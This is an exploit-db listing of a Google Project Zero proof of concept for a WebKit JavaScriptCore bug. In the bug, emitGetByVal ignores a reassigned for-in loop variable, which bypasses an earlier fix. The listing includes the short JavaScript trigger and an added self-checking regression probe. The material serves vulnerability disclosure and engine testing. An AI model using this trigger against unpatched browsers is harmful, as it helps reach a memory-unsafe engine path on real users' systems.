WebKit JSC – ‘BytecodeGenerator::emitGetByVal’ Incorrect Optimization (2)

  • Author: Google Security Research
    Date: 2017-10-04
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/42955/
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1319

The following PoC bypasses the fix for the issue 1263 (https://bugs.chromium.org/p/project-zero/issues/detail?id=1263)

PoC:
-->

function f() {
    let o = {};
    for (let i in {xx: 0}) {
        // The inner for-of reassigns the for-in loop variable i; the
        // subsequent o[i] lookup must observe that reassignment.
        for (i of [0]) {

        }

        print(o[i]);
    }
}

f();
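The PoC above only prints the result, so it does not by itself say what the correct answer is. The following is an added example (not part of the exploit-db entry or the Project Zero report) that turns the same pattern into a self-checking probe: per ECMAScript, `i` is an ordinary per-iteration `let` binding, so after the inner `for (i of [0])` the lookup `o[i]` must resolve `o[0]`, not the property name the for-in enumerator is currently on. An engine whose `emitGetByVal` fast path keeps consulting the enumerator instead of the reassigned binding fails this check. The object keys and marker strings are constructed for the example.

```javascript
// Added example: regression-style probe for for-in loop-variable reassignment.
// Not the original PoC; object contents are constructed sample data.

function forInReassignProbe() {
  // Both candidate keys carry distinct markers so the two code paths are
  // distinguishable: "xx" is the key the for-in enumerator is positioned on,
  // "0" is the value the inner for-of assigns to i.
  const o = { xx: "enumerated-key", 0: "reassigned-index" };
  const observed = [];
  for (let i in { xx: 0 }) {
    for (i of [0]) {
      // Body intentionally empty: the loop exists only to reassign i.
    }
    // Spec-correct behaviour: i === 0 and o[i] === o[0].
    observed.push({ i, value: o[i] });
  }
  return observed;
}

// Returns true when the engine honours the reassignment of i before o[i]
// is evaluated, i.e. when the for-in variable is treated as a plain binding.
function engineHonoursReassignment() {
  const results = forInReassignProbe();
  if (results.length !== 1) return false;
  const [r] = results;
  return r.i === 0 && r.value === "reassigned-index";
}

// Usage (Node / jsc): a test suite would assert the helper returns true.
if (typeof require !== "undefined" && require.main === module) {
  console.log(engineHonoursReassignment() ? "spec-correct" : "incorrect fast path");
}
```

In an engine test suite this would be a single assertion that `engineHonoursReassignment()` is true; the probe is deliberately free of any crash or memory-unsafe behaviour and only checks the semantic contract the optimisation violated.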